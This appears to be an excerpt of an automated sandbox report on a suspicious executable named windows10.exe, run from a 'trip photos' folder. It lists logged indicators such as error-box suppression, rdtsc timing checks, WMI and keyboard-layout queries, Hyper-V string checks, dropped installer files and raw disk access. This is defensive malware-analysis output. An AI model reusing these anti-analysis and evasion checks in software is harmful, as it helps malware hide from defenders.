            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeProcess information set: NOGPFAULTERRORBOX
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 5_2_00CBBF6F rdtsc 5_2_00CBBF6F
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5783.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI55AB.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5723.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5762.tmpJump to dropped file
            Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5820.tmpJump to dropped file
            Source: C:\Windows\Installer\MSI5DEF.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-34797
            Source: C:\Windows\Installer\MSI5DCF.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-34798
            Source: C:\Windows\Installer\MSI5DCF.tmpAPI coverage: 4.2 %
            Source: C:\Windows\Installer\MSI5DEF.tmpAPI coverage: 4.4 %
            Source: C:\Windows\System32\svchost.exe TID: 7768Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809Jump to behavior
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_ComputerSystem
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\CIMV2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\Installer\MSI5DCF.tmpCode function: 3_2_00B1069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00B1069D
            Source: C:\Windows\Installer\MSI5DEF.tmpCode function: 4_2_00B2069D FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00B2069D
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0097D08C FindFirstFileW,16_2_0097D08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 17_2_008FD08C FindFirstFileW,17_2_008FD08C
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exeCode function: 16_2_0097DCF8 GetSystemInfo,16_2_0097DCF8
            Source: windows10.exe, 0000001E.00000003.2590530414.000000000A041000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2591045873.000000000A048000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational@
            Source: windows10.exe, 0000001E.00000003.2415217489.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416072475.000000000071E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2413534085.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugowLMEM`8fm
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticLMEMP@
            Source: windows10.exe, 0000001D.00000003.2367709156.000000000086A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Admin$
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/AdminLMEM`h
            Source: windows10.exe, 0000001D.00000003.2366816542.000000000084D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2368207015.000000000085A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2416185354.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2897811597.000000000A04A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3631220152.000000000A06A000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2899145476.000000000A056000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3515474400.000000000A067000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3215839238.000000000A04B000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3514693196.000000000A065000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Operational
            Source: windows10.exe, 0000001D.00000003.2368345020.0000000000843000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2366816542.0000000000843000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2360685107.000000000083D000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2364272105.0000000000840000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3628086106.000000000A04F000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3406241581.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2306441919.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3318845003.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3213586625.00000000006F2000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2587239375.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticLMEMP
            Source: windows10.exe, 0000001E.00000003.2894301189.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2677112034.00000000006E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.2784380018.00000000006E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMhX
            Source: windows10.exe, 0000001E.00000003.3414132926.000000000A06E000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 0000001E.00000003.3410591707.000000000A04B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin*
